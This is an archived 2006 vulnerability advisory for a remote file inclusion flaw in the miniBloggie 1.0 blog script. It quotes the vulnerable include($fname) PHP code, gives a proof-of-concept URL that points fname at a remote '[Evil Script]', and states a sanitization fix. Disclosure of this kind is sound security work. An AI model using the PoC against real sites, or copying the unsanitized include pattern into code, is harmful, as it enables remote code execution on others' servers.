miniBloggie10.txt

2006-08-27T00:00:00
ID PACKETSTORM:49258
Type packetstorm
Reporter Sh3ll
Modified 2006-08-27T00:00:00

Description

                                        
                                            `---------------------------------------------------------------------------------------  
miniBloggie 1.0 fname Remote File Inclusion  
---------------------------------------------------------------------------------------  
Author : Sh3ll  
Date : 2006/05/01  
HomePage : http://www.sh3ll.ir  
Contact : sh3ll[at]sh3ll[dot]ir  
---------------------------------------------------------------------------------------  
Affected Software Description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Application : miniBloggie   
version : 1.0  
Venedor : http://www.mywebland.com  
Class : Remote File Inclusion  
Risk : High  
Summary : minibloggie, a mini blog script yet effective built using fast template   
for easy customisation. Using Mysql database system with edit, delete, , support smiley   
& BBcode, adminstrator log in for easy website management.  
  
---------------------------------------------------------------------------------------  
Vulnerability:  
~~~~~~~~~~~~~  
The Problem Exists Is in The cls_fast_template.php When Used The Variable in a $fname  
include() Function Without Being Declared.  
---------------------------------cls_fast_template.php---------------------------------  
....  
<?php  
else {  
fclose($fp);  
include $fname;  
return;  
}  
...  
---------------------------------------------------------------------------------------  
PoC:  
~~~  
http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script]  
  
Solution:  
~~~~~~~~  
Sanitize Variabel $fname in cls_fast_template.php  
----------------------------------------------------------------------------------------  
Note:  
~~~~  
Venedor Contacted, But No Response. So Do a Dirty Patch.  
----------------------------------------------------------------------------------------  
Shoutz:  
~~~~~~  
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena  
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams   
`